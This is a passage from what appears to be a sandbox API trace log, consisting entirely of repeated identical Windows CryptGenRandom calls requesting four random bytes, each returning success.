pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.207] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.208] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.209] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.211] CryptGenRandom (in: hProv=0x8bf310, 